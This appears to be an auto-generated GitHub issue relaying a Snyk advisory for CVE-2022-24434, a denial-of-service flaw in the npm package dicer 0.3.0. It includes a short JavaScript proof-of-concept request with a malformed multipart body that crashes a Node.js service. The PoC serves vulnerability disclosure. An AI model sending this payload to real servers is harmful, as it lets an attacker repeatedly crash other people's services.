CVE-2022-24434 - high detected in dicer['0.3.0']

Package Name: dicer Package Version: ['0.3.0'] Package Manager: npm Target File: package.json Severity Level: high Snyk ID: SNYK-JS-DICER-2311764 Snyk CVE: CVE-2022-24434 Snyk CWE: CWE-400 Link to issue in Snyk: https://app.snyk.io/org/cse_rhicksiii91/project/14f822de-b806-4bd7-9ad2-767a7feebe1d Snyk Description: ## Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.

## PoC:
```js
 fetch('form-image', {
 method: 'POST',
 headers: {
 ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
 ['content-length']: '145',
 host: '127.0.0.1:8000',
 connection: 'keep-alive',
 },
 body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
 });
```
## Remediation
There is no fixed version for `dicer`.
## References
- [GitHub Commit](https://github.com/mscdex/dicer/pull/22/commits/b7fca2e93e8e9d4439d8acc5c02f5e54a0112dac)
- [GitHub Issue](https://github.com/mscdex/busboy/issues/250)
- [GitHub PR](https://github.com/mscdex/dicer/pull/22)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2022-24434 - high detected in dicer['0.3.0'] #305

PoC:

Remediation

References

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

CVE-2022-24434 - high detected in dicer['0.3.0'] #305

Description

PoC:

Remediation

References

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions